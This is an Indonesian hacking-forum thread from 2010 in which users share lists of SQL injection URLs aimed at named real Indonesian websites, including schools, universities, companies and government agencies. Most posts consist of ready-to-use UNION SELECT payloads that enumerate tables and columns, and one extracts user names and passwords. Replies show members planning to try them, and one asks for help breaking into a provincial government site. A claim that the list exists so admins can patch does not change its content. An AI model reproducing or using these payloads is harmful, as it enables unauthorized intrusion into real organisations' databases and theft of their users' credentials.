kumpulan : Vuln WEB LOKAL, Masuk Sini..

abit doang · Post by **abit doang** » Sun May 16, 2010 1:48 pm

ini terinspirasi dari FORUM yang lama alias YOGYAFREE.NET

kita bikin KUMPULAN WEB LOKAL yang VULNERABLE aja ya.. inget CUMA WEB LOKAL..
jadi biar gak banyak tread yg gak jelas ujungnya [misal web yg udah di SQLi tapi mentok di login atau hash]

buat min n mod : kalo salah kamar atau tidak berkenan di hati, silahkan move atau delete..

INGET, CUMA WEB LOKAL, jadi biar bisa di liat ma ADMIN-NYA, atau biar ada yang LAPOR ke ADMIN-NYA BUAT di-PATCH.
INGET, CUMAN yang VULNERABLE, BUKAN yang udah DI DEFACE...
lest rocking...

Code: Select all

http://ebs.co.id/dt/index.php?cat_id=4+AND+1=2+UNION+SELECT+0,1,2,3,4,group_concat(table_name),6,7,8,9,10+from+information_schema.tables+where+table_schema=database()--

http://www.maxxis.co.id/read.php?id=18+AND+1=2+UNION+SELECT+0,1,version(),3,group_concat(table_name),5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--

http://www.raffles-international.org/news_details.php?news_id=-21+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(column_name),14,15+from+information_schema.columns+where+table_name=0x61646d696e--

http://www.isei.or.id/news.php?id=-7+union+select+0,1,2,concat(user_id,0x3a,user_name,0x3a,user_password),4+from+user--

http://www.primausada.com/news.php?news_id=-9+union+all+select+1,group_concat(column_name),3,4+FROM+information_schema.columns+where+table_name=0x757365725f6163636f756e74+limit+0,1--

LANJUT... :tapa:

abit doang · Post by **abit doang** » Mon May 17, 2010 10:54 pm

waduh, sepi banget ya..
nambah lagi dah.. update teruszz...

Code: Select all

http://www.sevilla.sch.id/detail_news.php?id=1+AND+1=2+UNION+SELECT+0,version(),2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--

ecko · Post by **ecko** » Mon May 17, 2010 11:13 pm

Wiiih,,,dicoba dulu nih kk.
Thank's

tlolor_x · Post by **tlolor_x** » Mon May 17, 2010 11:15 pm

maju terus............... n update terus..................

aq coba dulu yach kk....................... :devil

abit doang · Post by **abit doang** » Tue May 18, 2010 12:32 am

Code: Select all

http://www.otorita-asahan.go.id/berita.php?id=38+AND+1=2+UNION+SELECT+database(),group_concat(table_name),2,3+from+information_schema.tables+where+table_schema=database()--

agak GAJEBO, mungkin ada yg mau explor lebih dalam..
Ayolah, jangan malu atau takut...
Share lha hasil karya kalian di sini..
:tapa:

abit doang · Post by **abit doang** » Sun May 23, 2010 12:47 am

lha, yang laen pada gak mao nge share ya...
ah gak asik nih.. masa' gw nongkrong sendiri..
[sambil nungguin final cempien...]

Code: Select all

http://ft.unnes.ac.id/detail_berita.php?no=737+AND+1=2+UNION+SELECT+0,1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=0x646b5f61646d696e--

http://www.ummetro.ac.id/detail_berita.php?id=23+AND+1=2+UNION+SELECT+0,version(),2,3,4,5--

http://www.sman4-jkt.sch.id/detail_berita.php?id=9+AND+1=2+UNION+SELECT+0,version(),2,3,4,5--

http://outbondshaba.com/home/detail_berita.php?id=20010+AND+1=2+UNION+SELECT+0,1,version(),group_concat(column_name),4+from+information_schema.columns+where+table_name=0x61646d696e--

http://www.rsthamrinpurwakarta.com/detail_berita.php?recordID=19+AND+1=2+UNION+SELECT+version(),1,2,3,4,5,6+from+information_schema.tables+where+table_schema=database()--

http://estycollections.com/detail_berita.php?id_berita=71+AND+1=2+UNION+SELECT+0,group_concat(column_name),2,3,4+from+information_schema.columns+where+table_name=0x61646d696e--

http://sikd-pemkobatam.org/detail_berita.php?no=50+AND+1=2+UNION+SELECT+0,version(),2,3,4,5,6,7,8,9,10--

http://ormasorpol-bkblinmas.netau.net/berita/detail_berita.php?id=21+AND+1=2+UNION+SELECT+0,version(),2,3,4--

http://www.daarulabroor.net/detail_berita.php?id=23+AND+1=2+UNION+SELECT+0,group_concat(column_name),2,3+from+information_schema.columns+where+table_name=0x61646d696e--

tlolor_x · Post by **tlolor_x** » Sun May 23, 2010 11:03 pm

kk aq gk bsa apa2 udah dcobain semuanya dah mentok gk tau lgi.............

bsa minta tolong buat masuk neh site :http://www.jambiprov.go.id
share hasilnya yach..... :kaca:

cyber_terror1st · Post by **cyber_terror1st** » Mon May 24, 2010 10:21 pm

tlolor_x wrote:kk aq gk bsa apa2 udah dcobain semuanya dah mentok gk tau lgi.............

bsa minta tolong buat masuk neh site :http://www.jambiprov.go.id
share hasilnya yach..... :kaca:

wah om,napa harus site pemerintah lagi,kasian atuh

nanti makin banyaka aja yang deface site2 pemerintah
\

sory before :maaf: :maaf: :maaf: :maaf: :maaf:

shinichi81 · Post by **shinichi81** » Tue May 25, 2010 8:36 am

Bos,malah kalau web pemerintah harus terus dicek security-nya kenapa bisa gitu?? soalnya daripada diacak2 sama orang lain mendingan di tes secure-nya sama kita tetapi habis itu langsung confrm ke adminya supaya di patch :licik: :licik:

Nol Sembilan Tiga · Post by **Nol Sembilan Tiga** » Tue May 25, 2010 11:37 am

Setuju ma atas w.. drpd di acak2 negara tetangga... duluan kita dah.. :mati: :mati:

*Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

kumpulan : Vuln WEB LOKAL, Masuk Sini..

kumpulan : Vuln WEB LOKAL, Masuk Sini..

Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..

Re: kumpulan : Vuln WEB LOKAL, Masuk Sini..